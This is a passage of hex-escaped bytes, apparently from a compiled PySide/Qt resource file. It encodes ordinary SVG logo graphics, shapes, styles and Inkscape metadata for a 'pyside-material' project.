\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x74\x79\x70\x65\
\x3d\x22\x73\x74\x61\x72\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\
\x2e\x33\x33\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x65\x39\x37\x39\x38\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x39\x36\x30\x37\x38\x34\x33\x3b\x73\x74\x72\x6f\x6b\x65\x3a\
\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\
\x68\x3a\x31\x2e\x31\x36\x32\x37\x35\x32\x36\x33\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\x3a\x72\x6f\x75\x6e\
\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\
\x6e\x3a\x72\x6f\x75\x6e\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\
\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x6f\x66\x66\
\x73\x65\x74\x3a\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x30\x2e\x31\x34\x31\x35\x35\x32\x35\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x31\x35\x37\x38\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x73\x69\x64\x65\x73\x3d\x22\x34\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x63\x78\x3d\x22\x34\x36\x2e\x30\x33\x33\x30\x39\x36\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x63\x79\x3d\x22\x39\x39\x30\x2e\x32\x35\x32\x38\x37\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x72\x31\x3d\x22\x37\x35\x2e\x37\x31\x32\x39\x36\x37\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x72\x32\x3d\x22\x35\x33\x2e\x35\x33\x37\x31\x34\x38\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x61\x72\x67\x31\x3d\x22\x30\x2e\x37\x38\x35\x33\x39\x38\
\x31\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x61\x72\x67\x32\x3d\x22\x31\x2e\x35\x37\x30\
\x37\x39\x36\x33\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x66\x6c\x61\x74\x73\x69\x64\x65\x64\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x72\x6f\x75\x6e\x64\x65\x64\
\x3d\x22\x30\x2e\x32\x35\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x72\x61\x6e\x64\x6f\x6d\x69\
\x7a\x65\x64\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x64\x3d\x22\x6d\x20\x39\x39\x2e\x35\x37\x30\x32\x34\x39\x2c\x31\
\x30\x34\x33\x2e\x37\x39\x20\x63\x20\x2d\x31\x38\x2e\x39\x32\x38\
\x32\x34\x32\x2c\x31\x38\x2e\x39\x32\x38\x33\x20\x2d\x38\x38\x2e\
\x31\x34\x36\x30\x36\x33\x2c\x31\x38\x2e\x39\x32\x38\x33\x20\x2d\
\x31\x30\x37\x2e\x30\x37\x34\x33\x30\x34\x38\x2c\x30\x20\x2d\x31\
\x38\x2e\x39\x32\x38\x32\x34\x32\x32\x2c\x2d\x31\x38\x2e\x39\x32\
\x38\x32\x20\x2d\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x32\x2c\x2d\
\x38\x38\x2e\x31\x34\x36\x30\x34\x20\x2d\x34\x65\x2d\x37\x2c\x2d\
\x31\x30\x37\x2e\x30\x37\x34\x32\x38\x20\x31\x38\x2e\x39\x32\x38\
\x32\x34\x31\x32\x2c\x2d\x31\x38\x2e\x39\x32\x38\x32\x35\x20\x38\
\x38\x2e\x31\x34\x36\x30\x36\x33\x32\x2c\x2d\x31\x38\x2e\x39\x32\
\x38\x32\x35\x20\x31\x30\x37\x2e\x30\x37\x34\x33\x30\x34\x32\x2c\
\x30\x20\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x2c\x31\x38\x2e\x39\
\x32\x38\x32\x34\x20\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x2c\x38\
\x38\x2e\x31\x34\x36\x30\x38\x20\x31\x30\x65\x2d\x37\x2c\x31\x30\
\x37\x2e\x30\x37\x34\x32\x38\x20\x7a\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x74\x72\x61\x6e\
\x73\x66\x6f\x72\x6d\x2d\x63\x65\x6e\x74\x65\x72\x2d\x79\x3d\x22\
\x2d\x32\x2e\x30\x34\x32\x30\x39\x37\x39\x65\x2d\x30\x35\x22\x20\
\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x31\x33\x39\x2e\
\x37\x32\x35\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\
\x3d\x22\x2d\x35\x39\x31\x2e\x37\x30\x31\x31\x31\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x63\x69\x72\x63\x6c\x65\
\x31\x35\x34\x35\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\
\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\
\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\x6c\x6c\x3a\x23\x61\x61\
\x61\x61\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\x38\x38\x3b\x73\x74\x72\
\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x33\x30\x34\x30\x34\
\x39\x33\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\
\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\
\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x20\x2f\x3e\
\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\
\x6c\x6c\x3a\x23\x61\x61\x61\x61\x66\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\
\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x33\x30\x34\x30\x34\x39\x33\x34\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x36\x31\x37\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\x39\x33\x2e\
\x35\x31\x32\x38\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\
\x79\x3d\x22\x31\x36\x38\x2e\x31\x33\x36\x31\x34\x22\x20\x2f\x3e\
\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x63\x79\x3d\x22\x37\x33\x33\x2e\x32\x30\x37\x37\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\
\x35\x38\x2e\x31\x34\x34\x30\x34\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x39\x30\
\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\
\x39\x39\x39\x36\x3b\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\
\x31\x33\x36\x39\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\
\x30\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\
\x74\x68\x3a\x30\x2e\x37\x39\x33\x37\x34\x39\x39\x39\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\
\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\
\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x79\x3d\x22\x35\x38\x32\x2e\x33\x33\x30\x39\x39\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x31\x35\x30\x30\
\x2e\x39\x37\x32\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x39\x32\x36\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\
\x36\x3b\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\
\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\
\x39\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\
\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\
\x30\x2e\x37\x39\x33\x37\x34\x39\x39\x39\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\
\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\
\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x72\
\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\
\x22\x32\x35\x35\x2e\x39\x37\x38\x31\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\x35\x38\x2e\x31\x34\x34\x30\
\x34\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x65\
\x6c\x6c\x69\x70\x73\x65\x31\x39\x34\x36\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\
\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\x38\x38\x3b\
\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x37\x39\
\x33\x37\x34\x39\x39\x39\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\
\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\
\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x67\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\
\x22\x6d\x61\x74\x72\x69\x78\x28\x30\x2e\x35\x38\x37\x39\x36\x32\
\x39\x38\x2c\x30\x2c\x30\x2c\x30\x2e\x35\x38\x37\x39\x36\x32\x39\
\x38\x2c\x2d\x32\x39\x2e\x32\x32\x36\x31\x36\x33\x2c\x39\x38\x30\
\x2e\x38\x34\x35\x34\x37\x29\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x67\x34\x35\x35\x34\x22\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x67\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x67\x31\x30\x22\x3e\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x61\x73\x73\x3d\x22\
\x73\x74\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x35\x36\x2c\x2d\x35\x36\x20\
\x32\x30\x30\x2c\x2d\x35\x36\x20\x31\x37\x36\x2c\x2d\x38\x20\x38\
\x30\x2c\x2d\x38\x20\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x70\x6f\x6c\x79\x67\x6f\x6e\x34\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x34\x31\x63\x64\x35\x66\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x34\x31\x31\x37\x36\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x35\x36\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x2d\x38\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\
\x61\x73\x73\x3d\x22\x73\x74\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x36\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\x66\x64\x38\x30\x66\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x34\x31\x31\x37\x36\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6c\x61\x73\x73\
\x3d\x22\x73\x74\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x38\x2c\x38\
\x38\x20\x31\x37\x36\x2c\x2d\x38\x20\x38\x30\x2c\x2d\x38\x20\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x6f\x6c\x79\x67\x6f\x6e\x38\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x39\x33\x39\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x39\x34\x31\x31\x37\x36\
\x34\x37\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\
\x67\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x67\x3e\x0d\x0a\x20\x20\
\x3c\x2f\x67\x3e\x0d\x0a\x20\x20\x3c\x73\x74\x79\x6c\x65\x0d\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x73\x74\x79\x6c\x65\x32\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\
\x74\x2f\x63\x73\x73\x22\x3e\x0d\x0a\x09\x2e\x73\x74\x30\x7b\x66\
\x69\x6c\x6c\x3a\x23\x32\x31\x32\x31\x32\x31\x3b\x7d\x0d\x0a\x09\
\x2e\x73\x74\x31\x7b\x66\x69\x6c\x6c\x3a\x23\x46\x46\x38\x30\x41\
\x42\x3b\x7d\x0d\x0a\x09\x2e\x73\x74\x32\x7b\x66\x69\x6c\x6c\x3a\
\x23\x46\x46\x31\x37\x34\x34\x3b\x7d\x0d\x0a\x3c\x2f\x73\x74\x79\
\x6c\x65\x3e\x0d\x0a\x3c\x2f\x73\x76\x67\x3e\x0d\x0a\
\x00\x00\x09\xcd\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x47\x65\x6e\x65\
\x72\x61\x74\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\
\x75\x73\x74\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\
\x20\x53\x56\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\
\x2d\x49\x6e\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\
\x6e\x3a\x20\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\
\x20\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x3c\x73\x76\x67\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\
\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0d\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\
\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\
\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\
\x61\x78\x2d\x6e\x73\x23\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\
\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\
\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\
\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\
\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0d\x0a\x20\x20\x20\x78\x6d\
\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\
\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\
\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\
\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\
\x22\x0d\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\
\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\
\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x22\x0d\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\
\x31\x2e\x31\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x63\x6f\x6e\
\x74\x65\x6e\x74\x22\x0d\x0a\x20\x20\x20\x78\x3d\x22\x30\x70\x78\
\x22\x0d\x0a\x20\x20\x20\x79\x3d\x22\x30\x70\x78\x22\x0d\x0a\x20\
\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x35\x36\x20\x2d\x35\
\x36\x20\x35\x31\x32\x20\x35\x31\x32\x22\x0d\x0a\x20\x20\x20\x78\
\x6d\x6c\x3a\x73\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\
\x76\x65\x22\x0d\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x6c\x6f\x67\x6f\x2e\x73\
\x76\x67\x22\x0d\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x35\
\x31\x32\x22\x0d\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\
\x35\x31\x32\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\x66\x69\x6c\x65\x6e\x61\x6d\
\x65\x3d\x22\x2f\x68\x6f\x6d\x65\x2f\x79\x65\x69\x73\x6f\x6e\x2f\
\x44\x65\x76\x65\x6c\x6f\x70\x6d\x65\x6e\x74\x2f\x67\x63\x70\x64\
\x73\x2f\x70\x79\x73\x69\x64\x65\x2d\x6d\x61\x74\x65\x72\x69\x61\
\x6c\x2f\x64\x6f\x63\x73\x2f\x73\x6f\x75\x72\x63\x65\x2f\x5f\x73\
\x74\x61\x74\x69\x63\x2f\x6c\x6f\x67\x6f\x2e\x70\x6e\x67\x22\x0d\
\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\
\x6f\x72\x74\x2d\x78\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\
\x74\x2d\x79\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x34\x20\x35\x64\x61\x36\x38\x39\x63\
\x33\x31\x33\x2c\x20\x32\x30\x31\x39\x2d\x30\x31\x2d\x31\x34\x22\
\x3e\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0d\x0a\x20\x20\x20\x69\
\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x31\x37\x22\x3e\x3c\
\x72\x64\x66\x3a\x52\x44\x46\x3e\x3c\x63\x63\x3a\x57\x6f\x72\x6b\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\
\x75\x74\x3d\x22\x22\x3e\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\
\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x3c\x64\x63\x3a\x74\x79\
\x70\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\
\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\
\x65\x22\x20\x2f\x3e\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\
\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x63\x63\x3a\x57\
\x6f\x72\x6b\x3e\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x3c\x64\x65\x66\x73\x0d\x0a\
\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\x35\x22\x20\x2f\
\x3e\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\
\x76\x69\x65\x77\x0d\x0a\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\
\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0d\x0a\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0d\x0a\x20\x20\x20\x62\x6f\x72\x64\x65\
